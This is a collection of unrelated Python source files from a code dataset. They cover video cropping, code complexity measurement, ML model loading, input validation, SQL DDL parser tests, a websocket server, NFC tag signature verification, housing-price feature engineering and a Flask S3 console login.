size relative to the original size and a random aspect ratio is made. This
crop is finally resized to given size. This is popularly used to train the
Inception networks.
Args:
frames (torch.Tensor): Video tensor to be resized with shape (C, T, H, W).
target_height (int): Desired height after cropping.
target_width (int): Desired width after cropping.
scale (Tuple[float, float]): Scale range of Inception-style area based
random resizing. Should be between 0.0 and 1.0.
aspect_ratio (Tuple[float, float]): Aspect ratio range of Inception-style
area based random resizing. Should be between 0.0 and +infinity.
shift (bool): Bool that determines whether or not to sample two different
boxes (for cropping) for the first and last frame. If True, it then
linearly interpolates the two boxes for other frames. If False, the
same box is cropped for every frame. Default is False.
log_uniform_ratio (bool): Whether to use a log-uniform distribution to
sample the aspect ratio. Default is True.
interpolation (str): Algorithm used for upsampling. Currently supports
'nearest', 'bilinear', 'bicubic', 'area'. Default is 'bilinear'.
num_tries (int): The number of times to attempt a randomly resized crop.
Falls back to a central crop after all attempts are exhausted.
Default is 10.
Returns:
cropped (tensor): A cropped video tensor of shape (C, T, target_height, target_width).
"""
assert (
scale[0] > 0 and scale[1] > 0
), "min and max of scale range must be greater than 0"
assert (
aspect_ratio[0] > 0 and aspect_ratio[1] > 0
), "min and max of aspect_ratio range must be greater than 0"
channels = frames.shape[0]
t = frames.shape[1]
height = frames.shape[2]
width = frames.shape[3]
i, j, h, w = _get_param_spatial_crop(
scale, aspect_ratio, height, width, log_uniform_ratio, num_tries
)
if not shift:
cropped = frames[:, :, i : i + h, j : j + w]
return torch.nn.functional.interpolate(
cropped,
size=(target_height, target_width),
mode=interpolation,
)
i_, j_, h_, w_ = _get_param_spatial_crop(
scale, aspect_ratio, height, width, log_uniform_ratio, num_tries
)
i_s = [int(i) for i in torch.linspace(i, i_, steps=t).tolist()]
j_s = [int(i) for i in torch.linspace(j, j_, steps=t).tolist()]
h_s = [int(i) for i in torch.linspace(h, h_, steps=t).tolist()]
w_s = [int(i) for i in torch.linspace(w, w_, steps=t).tolist()]
cropped = torch.zeros((channels, t, target_height, target_width))
for ind in range(t):
cropped[:, ind : ind + 1, :, :] = torch.nn.functional.interpolate(
frames[
:,
ind : ind + 1,
i_s[ind] : i_s[ind] + h_s[ind],
j_s[ind] : j_s[ind] + w_s[ind],
],
size=(target_height, target_width),
mode=interpolation,
)
return cropped
| StarcoderdataPython |
1722607 | <filename>decomplexator/cc.py
"""
@author: <NAME>
Cleaned a bit by <NAME>
"""
import redbaron
redbaron.ipython_behavior = False
class CognitiveComplexity(object):
def evaluate(self, filename):
"""
Calculate cognitive complexity for all functions and methods defined in file.
"""
fns = dict()
with open(filename) as file:
red = redbaron.RedBaron(file.read())
for fn in red.find_all("def"):
names = []
p = fn
while p:
names = [p.name] + names
p = p.parent_find(['def', 'class'])
name = '.'.join(names)
cc = self.__sequences(fn) + self.__conditions(fn) + self.__structures(fn)
fns[name] = cc
return fns
def __sequences(self, func):
cc = 0
last = None
for node in func.find_all("BooleanOperatorNode"):
if last is None or node.value != last.value or node.parent_find(last) is None:
cc += 1
if 'not' in [node.value for node in node.find_all("UnitaryOperatorNode")]:
cc += 1
last = node
return cc
def __conditions(self, func):
return len(func.find_all("ElifNode")) + len(func.find_all("ElseNode"))
def __structures(self, func):
increments = {
"IfNode",
"TernaryOperatorNode",
"ComprehensionIfNode",
"ForNode",
"ComprehensionLoopNode",
"WhileNode",
"ExceptNode"
}
levels = increments.union({
"ElseNode",
"ElifNode",
"DefNode",
"LambdaNode"
})
nodes = list()
for node in increments:
nodes.extend(func.find_all(node))
cc = 0
for node in nodes:
node = node.parent
while node != func.parent:
name = node.__class__.__name__
if name in levels and (name != 'DefNode' or not self.__is_decorator(node)):
cc += 1
node = node.parent
return cc
def __is_decorator(self, func):
values = [
node.__class__.__name__
for node in func.value
if node.__class__.__name__ not in ['CommentNode', 'EndlNode']
]
return len(values) == 2 and values[0] == 'DefNode' and values[1] == 'ReturnNode'
| StarcoderdataPython |
3237772 | <filename>utils/train_helper.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from graphs.models.deeplab_multi import DeeplabMulti
from modeling.deeplab import *
def get_model(args):
if args.backbone == "deeplabv2_multi":
model = DeeplabMulti(num_classes=args.num_classes,
pretrained=args.imagenet_pretrained)
params = model.optim_parameters(args)
args.numpy_transform = True
elif args.backbone == "deeplabv3_plus":
model = DeepLab(num_classes=args.num_classes,
backbone='resnet',
output_stride=16,
sync_bn = False,
freeze_bn=False)
params = model.optim_parameters(args)
args.numpy_transform = True
return model, params
| StarcoderdataPython |
1657903 | <filename>PCprophet/validate_input.py
import PCprophet.exceptions as PCpexc
import pandas as pd
class InputTester(object):
"""
docstring for InputTester
validate all inputs before anything
infile is a panda dataframe
"""
def __init__(self, path, filetype, infile=None):
super(InputTester, self).__init__()
self.infile = infile
self.filetype = filetype
self.path = path
def read_infile(self):
self.infile = pd.read_csv(self.path, sep="\t", index_col=False)
def test_missing_col(self, col):
"""
check columns in self
"""
# print(set(list(self.infile)))
if not all([x in self.infile.columns for x in col]):
raise PCpexc.MissingColumnError(self.path)
def test_empty(self, col):
for x in col:
if self.infile[x].isnull().values.any():
raise PCpexc.EmptyColumnError(self.path)
def test_uniqueid(self, totest):
if self.infile.duplicated(totest).any():
print("The following rows in {} are duplicated".format(self.path))
print(self.infile[self.infile.duplicated(totest)])
raise PCpexc.DuplicateIdentifierError(self.path)
def test_all(self, *args):
"""
performs all test
"""
self.test_missing_col(args[0])
self.test_uniqueid(args[1])
def test_na(self):
if self.infile.isnull().values.any():
raise PCpexc.NaInMatrixError(self.path)
def test_file(self):
self.read_infile()
if self.filetype == "ids":
col = ["Sample", "cond", "group", "short_id", "repl", "fr"]
unique = ["repl", "short_id"]
self.test_all(col, unique)
self.test_empty(col)
elif self.filetype == "db":
try:
col = ["ComplexID", "ComplexName", "subunits(Gene name)"]
unique = ["ComplexName", "ComplexID"]
self.test_all(col, unique)
[self.test_empty(x for x in col)]
except PCpexc.MissingColumnError as e:
self.test_missing_col(["protA", "protB"])
elif self.filetype == "in":
col = ["GN", "ID"]
unique = ["GN"]
self.test_all(col, unique)
self.test_na()
| StarcoderdataPython |
3317724 | from unittest import TestCase
from sqltest.parser import SparkSqlExtractor
from sqltest.parser.catalog import Field
class TestSqlExtractor(TestCase):
def test_should_extract_table_succeed_with_normalize_sql(self):
extractor = SparkSqlExtractor()
create_table_ddl = """
CREATE TABLE IF NOT EXISTS db_name.tb_name
(
subject STRING,
student_id INT ,
student_gender STRING,
student_age INT,
score INT
)
USING PARQUET
PARTITIONED BY (subject, `student_age`)
TBLPROPERTIES ("foo"="bar", "val"="value")
LOCATION 'target_data_path/db_name/tb_name'
;
"""
table = extractor.extract_table(create_table_ddl)
self.assertEqual(table.name, "tb_name")
self.assertEqual(table.db, "db_name")
self.assertEqual(
list(table.fields),
[
Field("subject", "STRING"),
Field("student_id", "INT"),
Field("student_gender", "STRING"),
Field("student_age", "INT"),
Field("score", "INT"),
],
)
self.assertEqual(list(table.partitions), ["subject", "student_age"])
def test_should_extract_table_succeed_with_non_normalize_sql(self):
extractor = SparkSqlExtractor()
create_table_ddl = """
CREATE TABLE IF NOT EXISTS db_name.tb_name
(
subject STRING
, student_id INT
,student_gender STRING
, student_age INT
,score INT
)
USING PARQUET
PARTITIONED BY (subject)
TBLPROPERTIES ('foo'='bar', 'val'='value')
LOCATION 'target_data_path/db_name/tb_name'
;
"""
table = extractor.extract_table(create_table_ddl)
self.assertEqual(table.name, "tb_name")
self.assertEqual(table.db, "db_name")
self.assertEqual(
list(table.fields),
[
Field("subject", "STRING"),
Field("student_id", "INT"),
Field("student_gender", "STRING"),
Field("student_age", "INT"),
Field("score", "INT"),
],
)
self.assertEqual(list(table.partitions), ["subject"])
| StarcoderdataPython |
42898 | <filename>src/mipi-code2vec/mipi_websocket/mipi_server.py
#!/usr/bin/env python
import asyncio
import json
import websockets
from mipi.base_codemeaning_predictor import PatchInfo
from mipi.mipi_app import Mipi
class MipiWSServer:
def __init__(self, mipi_obj, address="localhost", port=8765, port_admin=8766):
self.port = port
self.port_admin = port_admin
self.address = address
self.mipi = mipi_obj
async def shutdown(self):
print('stopping ws server')
asyncio.get_event_loop().stop()
print('ws server stopped')
async def evaluate_patch(self, websocket, patch_info):
print('Begin evaluate patch')
patch = PatchInfo()
patch.from_json(patch_info)
result = self.mipi.evaluate(patch)
print('End evaluate patch, results: \n%s' % result)
message = result.to_json()
print('Begin send message: %s' % message)
await websocket.send(message)
async def hello(self, websocket, path):
# await register(websocket)
print("hello begin, path: %s, ws: %s" % (path, websocket))
# data = await websocket.recv()
async for message in websocket:
print("message: %s" % message)
try:
patch_info = json.loads(message)
await self.evaluate_patch(websocket, patch_info)
except ValueError as e:
response_msg = "NOT JSON: %s" % message
print("response message: %s" % response_msg)
# await asyncio.wait(websocket.send(response_msg))
await websocket.send(response_msg)
print("hello end, path: %s, ws: %s" % (path, websocket))
async def shutdown_ws_server(self, websocket, path):
print("shutdown begin: ws: %s, path: %s" % (websocket, path))
await self.shutdown()
def start(self):
start_server = websockets.serve(self.hello, self.address, self.port)
print("Starting")
asyncio.get_event_loop().run_until_complete(start_server)
print(f'Listening for requests at [ws://{self.address}:{self.port}]')
shutdown_server = websockets.serve(self.shutdown_ws_server, self.address, self.port_admin)
# print('start admin')
asyncio.get_event_loop().run_until_complete(shutdown_server)
asyncio.get_event_loop().run_forever()
# print("stopped")
if __name__ == '__main__':
mipi = Mipi()
server = MipiWSServer(mipi)
server.start()
| StarcoderdataPython |
3310485 | # Verify asymmetric originality signature
# Based on public AN12196 8.2 Asymmetric check
import sys
import binascii
from ecdsa import VerifyingKey
from ecdsa.curves import NIST224p
from ecdsa.keys import BadSignatureError
PUBLIC_KEY = binascii.unhexlify(b"048A9B380AF2EE1B98DC417FECC263F8449C7625CECE82D9B916C992DA209D68422B81EC20B65A66B5102A61596AF3379200599316A00A1410")
def validate_tag(uid: bytes, sig: bytes) -> bool:
vk = VerifyingKey.from_string(PUBLIC_KEY, curve=NIST224p)
try:
vk.verify_digest(sig, uid)
except BadSignatureError:
return False
return True
if __name__ == "__main__":
if len(sys.argv) != 3:
print('Usage: python3 validate_ecc.py <uid> <sig>')
print(' uid - tag UID, hex encoded')
print(' sig - originality signature as returned by Read_Sig')
print('Example:')
print(' python3 validate_ecc.py 04518DFAA96180 D1940D17CFEDA4BFF80359AB975F9F6514313E8F90C1D3CAAF5941AD744A1CDF9A83F883CAFE0FE95D1939B1B7E47113993324473B785D21')
sys.exit(2)
uid = binascii.unhexlify(sys.argv[1])
sig = binascii.unhexlify(sys.argv[2])
if validate_tag(uid, sig):
print('OK')
sys.exit(0)
else:
print('INVALID')
sys.exit(1)
| StarcoderdataPython |
1676297 | # -*- coding: utf-8 -*-
"""
Created on Wed May 17 16:36:14 2017
@author: vrtjso
"""
import numpy as np
import pandas as pd
from datetime import datetime, date
from operator import le, eq
from Utils import sample_vals, FeatureCombination
import gc
from sklearn import model_selection, preprocessing
from sklearn.decomposition import PCA
from sklearn.linear_model import LinearRegression
####Data Cleaning####
print('Data Cleaning...')
#Data importing
trainDf = pd.read_csv('train.csv').set_index('id')
testDf = pd.read_csv('test.csv').set_index('id')
fix = pd.read_excel('BAD_ADDRESS_FIX.xlsx').set_index('id')
testDf['isTrain'] = 0
trainDf['isTrain'] = 1
allDf = pd.concat([trainDf,testDf])
allDf.update(fix, filter_func = lambda x:np.array([True]*x.shape[0])) #update fix data
macro = pd.read_csv('macro.csv')
#Join division and macro
divisions = pd.read_csv('divisions.csv')
allDf = allDf.join(divisions.set_index('sub_area'), on='sub_area')
# macro = pd.read_csv('macro.csv')
# allDf = allDf.join(macro[['timestamp','macro_combined_index']].set_index('timestamp'), on='timestamp')
# macro = macro.loc[365:2343,:] #drop data before 2011 and after 2016.6
# macro_full = macro.loc[:,macro.count()==1979] # drop nan columns
# macro_missing = macro.loc[:2190,macro.count()==1826]
# allDf = allDf.join(macro_full.set_index('timestamp'), on='timestamp')
# FeatureCombination(macro_full.drop('timestamp',1),'',10)
# Drop variable with no use (actuallly they are useful :)
# allDf = allDf.drop(['16_29_male','cafe_count_5000_price_1500','market_count_1000',
# '0_6_male','young_male','build_count_before_1920','market_count_1500',
# 'trc_count_500','church_count_3000','cafe_count_2000_na_price',
# 'mosque_count_3000','leisure_count_2000','build_count_slag',
# "oil_chemistry_raion","railroad_terminal_raion","mosque_count_500",
# "nuclear_reactor_raion", "build_count_foam", "big_road1_1line",
# "trc_sqm_500", "cafe_count_500_price_high","mosque_count_1000", "mosque_count_1500"],1)
# Drop no use macro
# allDf = allDf.drop(["real_dispos_income_per_cap_growth","profitable_enterpr_share",
# "unprofitable_enterpr_share","share_own_revenues","overdue_wages_per_cap",
# "fin_res_per_cap","marriages_per_1000_cap","divorce_rate","construction_value",
# "invest_fixed_assets_phys","pop_migration","pop_total_inc","housing_fund_sqm",
# "lodging_sqm_per_cap","water_pipes_share","baths_share","sewerage_share","gas_share",
# "hot_water_share","electric_stove_share","heating_share","old_house_share",
# "infant_mortarity_per_1000_cap", "perinatal_mort_per_1000_cap", "incidence_population",
# "load_of_teachers_preschool_per_teacher","provision_doctors","power_clinics","hospital_beds_available_per_cap",
# "hospital_bed_occupancy_per_year","provision_retail_space_sqm","provision_retail_space_sqm",
# "theaters_viewers_per_1000_cap","museum_visitis_per_100_cap","population_reg_sports_share",
# "students_reg_sports_share","apartment_build",
# 'gdp_annual_growth','old_education_build_share','provision_nurse','employment', #这行开始是importance为0的feature
# 'apartment_fund_sqm','invest_fixed_capital_per_cap'],1)
### Change price by rate ###
allDf['timestamp'] = pd.to_datetime(allDf['timestamp'])
# price_q_rate = [0,1.1,1,2.36,7.6,2.79,2.79,2.77,-1.68,1.04,.44,.41,-.98,1.26,.86,1.69,1.12,-.68,-1.85,-1.66,-1.69,-.097]
# price_rate = [1]
# for i in range(1,len(price_q_rate)):
# price_rate.append(price_rate[i-1] * (1 + price_q_rate[i] * 0.01))
# year_quarter = np.array((allDf.timestamp.dt.year - 2011) * 4 + allDf.timestamp.dt.quarter - 1)
# p = np.ones(allDf.shape[0])
# for i in range(0,allDf.shape[0]):
# p[i] = price_rate[year_quarter[i]]
# allDf['price_rate'] = p
# allDf['price_doc'] = allDf.price_doc / allDf.price_rate
# time = np.array([])
# for i in allDf.index:
# time = np.append(time, datetime.strptime(allDf['timestamp'][i], '%Y-%m-%d').timestamp())
# allDf['time'] = time
# allDf.drop('timestamp', 1, inplace=True)
allDf['apartment_name'] = allDf.sub_area + allDf['metro_km_avto'].astype(str)
eco_map = {'excellent':4, 'good':3, 'satisfactory':2, 'poor':1, 'no data':0}
allDf['ecology'] = allDf['ecology'].map(eco_map)
#encode subarea in order
# price_by_area = allDf['price_doc'].groupby(allDf.sub_area).mean().sort_values()
# area_dict = {}
# for i in range(0,price_by_area.shape[0]):
# area_dict[price_by_area.index[i]] = i
# allDf['sub_area'] = allDf['sub_area'].map(area_dict)
for c in allDf.columns:
if allDf[c].dtype == 'object':
lbl = preprocessing.LabelEncoder()
lbl.fit(list(allDf[c].values))
allDf[c] = lbl.transform(list(allDf[c].values))
# PCA on area feature
# area_feature = []
# for i in allDf.columns:
# if allDf[i].groupby(allDf.sub_area).var().mean()==0 and i != 'sub_area':
# area_feature.append(i)
# areaDf = allDf[area_feature]
# nonareaDf = allDf.drop(area_feature,1)
# areaDf = FeatureCombination(areaDf,'',10)
# allDf = pd.concat([nonareaDf,areaDf],1)
# allDf = FeatureCombination(allDf,'cafe_count',7)
#FeatureCombination(allDf,'sport_count',5)
#FeatureCombination(allDf,'market_count',3)
#FeatureCombination(allDf,'leisure_count',5)
#FeatureCombination(allDf,'church_count',5)
#FeatureCombination(allDf,'big_church_count',5)
#FeatureCombination(allDf,'trc_count',5)
#FeatureCombination(allDf,'office_sqm',5)
#FeatureCombination(allDf,'trc_sqm',3)
#FeatureCombination(allDf,'railroad_station',2)
#FeatureCombination(allDf,'metro',2)
#Transform price to log price
#allDf['log_price'] = np.log1p(allDf.price_doc)
#Drop all training samples with strange price.
#allDf = allDf[~((allDf.price_doc==1000000) & (allDf.product_type_Investment==1))]
#allDf = allDf[~((allDf.price_doc==2000000) & (allDf.product_type_Investment==1))]
#allDf.ix[allDf.price_doc==2000000,'w'] = 0.7
#Undersample strange price
# allDf = sample_vals(allDf, 1000000, 1/8, le)
# allDf = sample_vals(allDf, 2000000, 1/4, eq)
# allDf = sample_vals(allDf, 3000000, 1/2, eq)
#allDf = allDf.reset_index(drop=True)
#allDf.drop('price_doc',1,inplace=True)
###Dealing with Outlier###
allDf.loc[allDf.full_sq>2000,'full_sq'] = np.nan
allDf.loc[allDf.full_sq<3,'full_sq'] = np.nan
allDf.loc[allDf.life_sq>500,'life_sq'] = np.nan
allDf.loc[allDf.life_sq<3,'life_sq'] = np.nan
# allDf['lifesq_to_fullsq'] = 0 # 0 for normal, 1 for close,2 for outlier
allDf.loc[allDf.life_sq>0.8*allDf.full_sq,'life_sq'] = np.nan
# allDf.ix[allDf.life_sq>allDf.full_sq,['life_sq','lifesq_to_fullsq']] = np.nan, 2
allDf.loc[allDf.kitch_sq>=allDf.life_sq,'kitch_sq'] = np.nan
allDf.loc[allDf.kitch_sq>500,'kitch_sq'] = np.nan
allDf.loc[allDf.kitch_sq<2,'kitch_sq'] = np.nan
allDf.loc[allDf.state>30,'state'] = np.nan
allDf.loc[allDf.build_year<1800,'build_year'] = np.nan
allDf.loc[allDf.build_year==20052009,'build_year'] = 2005
allDf.loc[allDf.build_year==4965,'build_year'] = np.nan
allDf.loc[allDf.build_year>2021,'build_year'] = np.nan
allDf.loc[allDf.num_room>15,'num_room'] = np.nan
allDf.loc[allDf.num_room==0,'num_room'] = np.nan
allDf.loc[allDf.floor==0,'floor'] = np.nan
allDf.loc[allDf.max_floor==0,'max_floor'] = np.nan
allDf.loc[allDf.floor>allDf.max_floor,'max_floor'] = np.nan
#allDf.ix[allDf.full_sq>300,'full_sq'] = np.nan
#allDf.ix[allDf.life_sq>250,'life_sq'] = np.nan
# brings error down a lot by removing extreme price per sqm
bad_index = allDf[allDf.price_doc/allDf.full_sq > 600000].index
bad_index = bad_index.append(allDf[allDf.price_doc/allDf.full_sq < 10000].index)
allDf.drop(bad_index,0,inplace=True)
####Feature Engineering####
print('Feature Engineering...')
gc.collect()
##Time
# isWeekend = []
# month = []
# year = []
# weekday = []
# week_of_year = []
# year_month = []
# for i in allDf.index:
# dateS = date.fromtimestamp(allDf.time[i]) #timestamp
# isWeekend.append(1 if dateS.isoweekday() == 6 or dateS.isoweekday() == 7 else 0)
# month.append(dateS.month)
# year.append(dateS.year)
# year_month.append(dateS.year*100 + dateS.month)
# weekday.append(dateS.weekday())
# week_of_year.append(dateS.isocalendar()[1])
##allDf['is_weekend'] = pd.Series(isWeekend) #seems to be of no use
# allDf['month'] = np.array(month)
allDf['year'] = allDf.timestamp.dt.year #may be no use because test data is out of range
allDf['weekday'] = allDf.timestamp.dt.weekday
#allDf['week_of_year'] = np.array(week_of_year)
##allDf['year_month'] = np.array(year_month)
#w_map = {2011:0.8, 2012:0.8, 2013:0.9, 2014:1, 2015:1, 2016:0}
#allDf['w'] = [w_map[i] for i in year]
# Assign weight
allDf['w'] = 1
allDf.loc[allDf.price_doc==1000000,'w'] *= 0.5
allDf.loc[allDf.year==2015,'w'] *= 1.5
#May lead to overfitting
#Change timestamp to accumulated days.
#accum_day = np.array([])
#day0 = date(2011,8,20)
#for i in range(0,allDf.shape[0]):
# accum_day = np.append(accum_day, (date.fromtimestamp(allDf.time[allDf.index[i]]) - day0).days)
#allDf['accum_day'] = pd.Series(accum_day) #试试把时间去掉
# Sale count
# mon_to_sale = allDf.groupby('month')['month'].count().to_dict()
# allDf['sale_cnt_mon'] = allDf['month'].map(mon_to_sale)
# week_to_sale = allDf.groupby('week_of_year')['week_of_year'].count().to_dict()
# allDf['sale_cnt_week'] = allDf['week_of_year'].map(week_to_sale)
# allDf = allDf.drop('week_of_year',1)
# allDf = allDf.drop('month',1)
# weekday_to_sale = allDf.groupby('weekday')['weekday'].count().to_dict()
# allDf['sale_cnt_weekday'] = allDf['weekday'].map(weekday_to_sale)
# area_to_sale = allDf.groupby('sub_area')['sub_area'].count().to_dict()
# allDf['sale_cnt_area'] = allDf['sub_area'].map(area_to_sale)
# OKRUGS_to_sale = allDf.groupby('OKRUGS')['OKRUGS'].count().to_dict()
# allDf['sale_cnt_OKRUGS'] = allDf['OKRUGS'].map(OKRUGS_to_sale)
# allDf['year_month'] = (allDf.timestamp.dt.year - 2011) * 12 + allDf.timestamp.dt.month
# year_mon_to_sale = allDf.groupby('year_month')['year_month'].count().to_dict()
# allDf['sale_cnt_year_mon'] = allDf['year_month'].map(year_mon_to_sale)
# allDf.drop('year_month',1,inplace=True)
#Location
#center_OKRUGS_lon = allDf.groupby('OKRUGS')['lon'].mean().to_dict()
#center_OKRUGS_lat = allDf.groupby('OKRUGS')['lat'].mean().to_dict()
#allDf['dist_to_OKRUGS_center'] = np.sqrt((allDf['lon'] - allDf['OKRUGS'].map(center_OKRUGS_lon)) ** 2 +
# (allDf['lat'] - allDf['OKRUGS'].map(center_OKRUGS_lat)) ** 2)
#Floor
allDf['floor_by_max_floor'] = allDf.floor / allDf.max_floor
#allDf['floor_to_top'] = allDf.max_floor - allDf.floor
#Room
allDf['avg_room_size'] = (allDf.life_sq - allDf.kitch_sq) / allDf.num_room
allDf['life_sq_prop'] = allDf.life_sq / allDf.full_sq
allDf['kitch_sq_prop'] = allDf.kitch_sq / allDf.full_sq
#Calculate age of building
allDf['build_age'] = allDf.year - allDf.build_year
allDf = allDf.drop('build_year', 1)
#Population
allDf['popu_den'] = allDf.raion_popul / allDf.area_m
allDf['gender_rate'] = allDf.male_f / allDf.female_f
allDf['working_rate'] = allDf.work_all / allDf.full_all
#Education
allDf.loc[allDf.preschool_quota==0,'preschool_quota'] = np.nan
allDf['preschool_ratio'] = allDf.children_preschool / allDf.preschool_quota
allDf['school_ratio'] = allDf.children_school / allDf.school_quota
## Group statistics
# avg_yearbuilt_area = allDf.groupby('sub_area')['build_age'].mean().to_dict()
# allDf['avg_yearbuilt_area'] = allDf['sub_area'].map(avg_yearbuilt_area)
# avg_yearbuilt_OKRUGS = allDf.groupby('OKRUGS')['build_age'].mean().to_dict()
# allDf['avg_yearbuilt_OKRUGS'] = allDf['OKRUGS'].map(avg_yearbuilt_OKRUGS)
# Mathematical features
# polyf = ['full_sq','build_age','life_sq','floor','max_floor','num_room']
# for i in range(0,len(polyf)):
# for j in range(i,len(polyf)):
# allDf[polyf[i]+'*'+polyf[j]] = allDf[polyf[i]] * allDf[polyf[j]]
allDf['square_full_sq'] = (allDf.full_sq - allDf.full_sq.mean()) ** 2
allDf['square_build_age'] = (allDf.build_age - allDf.build_age.mean()) ** 2
allDf['nan_count'] = allDf[['full_sq','build_age','life_sq','floor','max_floor','num_room']].isnull().sum(axis=1)
allDf['full*maxfloor'] = allDf.max_floor * allDf.full_sq
allDf['full*floor'] = allDf.floor * allDf.full_sq
allDf['full/age'] = allDf.full_sq / (allDf.build_age + 0.5)
allDf['age*state'] = allDf.build_age * allDf.state
# new trial
allDf['main_road_diff'] = allDf['big_road2_km'] - allDf['big_road1_km']
allDf['rate_metro_km'] = allDf['metro_km_walk'] / allDf['ID_metro'].map(allDf.metro_km_walk.groupby(allDf.ID_metro).mean().to_dict())
allDf['rate_road1_km'] = allDf['big_road1_km'] / allDf['ID_big_road1'].map(allDf.big_road1_km.groupby(allDf.ID_big_road1).mean().to_dict())
# best on LB with weekday
allDf['rate_road2_km'] = allDf['big_road2_km'] / allDf['ID_big_road2'].map(allDf.big_road2_km.groupby(allDf.ID_big_road2).mean().to_dict())
allDf['rate_railroad_km'] = allDf['railroad_station_walk_km'] / allDf['ID_railroad_station_walk'].map(allDf.railroad_station_walk_km.groupby(allDf.ID_railroad_station_walk).mean().to_dict())
# increase CV from 2.35 to 2.33 but lower LB a little bit (with month)
# allDf['additional_edu_index'] = allDf.additional_education_km / allDf.additional_education_raion
# allDf['rate_edu_km'] = (allDf['additional_education_km']
# / allDf['sub_area'].map(allDf.additional_education_km.groupby(allDf.sub_area).mean().to_dict())) / (allDf.additional_education_raion+0.5)
# allDf['num_house_metro'] = allDf['ID_metro'].map(allDf['full_sq'].groupby(allDf.ID_metro).count().to_dict())
# allDf['num_house_road'] = allDf['ID_big_road1'].map(allDf['full_sq'].groupby(allDf.ID_big_road1).count().to_dict())
# do not improve both CV and LB
allDf.drop(['year','timestamp'], 1, inplace = True)
#Separate train and test again
trainDf = allDf[allDf.isTrain==1].drop(['isTrain'],1)
testDf = allDf[allDf.isTrain==0].drop(['isTrain','price_doc', 'w'],1)
outputFile = 'train_featured.csv'
trainDf.to_csv(outputFile,index=False)
outputFile = 'test_featured.csv'
testDf.to_csv(outputFile,index=False)
# Xgboost handles nan itself
'''
### Dealing with NA ###
#num_room, filled by linear regression of full_sq
if filename == 'train_encoded.csv': #na in num_room only appear in training set
LR = LinearRegression()
X = allDf.full_sq[~(np.isnan(allDf.num_room) | np.isnan(allDf.full_sq))].values.reshape(-1, 1)
y = np.array(allDf.num_room[~(np.isnan(allDf.num_room) | np.isnan(allDf.full_sq))])
LR.fit(X,y)
newX = allDf.full_sq[np.isnan(allDf.num_room)].values.reshape(-1, 1)
newX[np.isnan(newX)] = newX[~np.isnan(newX)].mean() #Special cases (na in full_sq) in test data
yfit = LR.predict(newX)
allDf.ix[np.isnan(allDf.num_room),'num_room'] = yfit
#max_floor, twice as the floor
allDf.ix[np.isnan(allDf.max_floor),'max_floor'] = allDf.ix[np.isnan(allDf.max_floor),'floor'] * 2
'''
| StarcoderdataPython |
1764252 | # StorageGRID Data Management Console (DMC)
# Copyright (c) 2018, NetApp, Inc.
# Licensed under the terms of the Modified BSD License (also known as New or Revised or 3-Clause BSD)
import sys
import json
from functools import wraps
from flask import Flask, send_file, render_template, session, request
import botocore, boto3
import logging
import time
import math
import os
from config import *
from utils import *
DMC_APP = Flask(__name__, static_folder=None)
DMC_APP.secret_key = os.urandom(24)
logging.basicConfig(filename='dmc.log', level=logging.INFO, format='[%(asctime)s] %(levelname)s: %(message)s')
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
logging.getLogger('werkzeug').setLevel(logging.WARNING)
logger = logging.getLogger('dmc')
def get_s3_client():
""" Function used to create s3 client to make API calls.
:return: dictionary containing success status and response or error message, and client if success
"""
try:
s3_client = boto3.client(
's3',
aws_access_key_id=session['aws_access_key_id'],
aws_secret_access_key=session['aws_secret_access_key'],
endpoint_url=session['endpoint_url'],
verify=session['verify_server_cert'],
config=botocore.client.Config(user_agent_extra="DMC-SGWS")
)
return {'success': True}, s3_client
except Exception as exception:
logger.exception('Create s3 client: {}'.format(exception.message))
return {"success": False, "message": exception.message, "not_authenticated": True}, None
from object_operations import *
from bucket_operations import *
def login_required(f):
""" Decorator to check user login status.
:param f: function to call
:return: function to call if success
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not session.get('logged_in'):
return jsonify({"not_authenticated": True})
return f(*args, **kwargs)
return decorated_function
@DMC_APP.route('/static/<path:filename>')
def serve_static(filename):
""" Function used to serve static files in 'static' directory
:param filename: name of the requested file
:return: static file
"""
return send_file(resource_path(os.path.join('static', filename)))
@DMC_APP.route('/downloads/<path:filename>')
@login_required
def serve_downloads(filename):
""" Function used to serve static files in 'downloads' directory
:param filename: name of the requested file
:return: static file
"""
return send_file(resource_path(os.path.join('downloads', filename)))
@DMC_APP.route("/")
def index():
""" Root function to serve index.html file and public key.
:return: index.html
"""
version, build = get_version_info()
return render_template("index.html", public_key=public_key, version=version, build=build)
@DMC_APP.route('/login', methods=['GET', 'POST'])
def login():
""" Function used to check login status, or logging in.
:return: dictionary containing success status and response or error message
"""
if request.method == "GET":
if session.get('logged_in'):
if session['logged_in']:
logger.info('Login status: True.')
return jsonify({'success': True, "name": session["account_name"]})
else:
logger.info('Login status: False.')
session.pop('logged_in', None)
session.clear()
return jsonify({'success': False, 'message': 'Session expired.', 'not_authenticated': True})
else:
json_data = request.json
logger.debug("Login: request parameters - {}".format(json_data))
access_key = json_data.get('access_key', '')
secret_key = json_data.get('secret_key', '')
rest_endpoint = json_data.get('rest_endpoint', '')
inputs_to_validate = {
'access_key': access_key,
'secret_key': secret_key,
'rest_endpoint': rest_endpoint
}
response = validate_inputs(inputs_to_validate)
if not response['success']:
logger.error('Login: {}'.format(response['message']))
return jsonify(response)
secret_key = cipher_rsa.decrypt(secret_key.decode('base64'), 'ERROR')
if not len(access_key) == 20:
logger.error(DMC_INVALID_ACCESS_KEY)
return jsonify({'success': False, "message": DMC_INVALID_ACCESS_KEY})
if not len(secret_key) == 40:
logger.error(DMC_INVALID_SECRET_KEY)
return jsonify({'success': False, "message": DMC_INVALID_SECRET_KEY})
hostname_regex = re.compile(
'^https?://(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)'
'*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])(:[0-9]{2,5})?$')
if not hostname_regex.match(rest_endpoint):
logger.error(DMC_INVALID_REST_ENDPOINT)
return jsonify({'success': False, "message": DMC_INVALID_REST_ENDPOINT})
session['aws_access_key_id'] = access_key
session['aws_secret_access_key'] = secret_key
session['endpoint_url'] = rest_endpoint
session['verify_server_cert'] = json_data.get('verify_cert', True)
buckets_list = get_buckets()
if buckets_list['success']:
logger.info('Logged in successfully.')
session['logged_in'] = True
buckets_list = convert_date_to_strings(buckets_list)
session["account_name"] = buckets_list['response']['Owner']['DisplayName']
session["pagination_markers"] = []
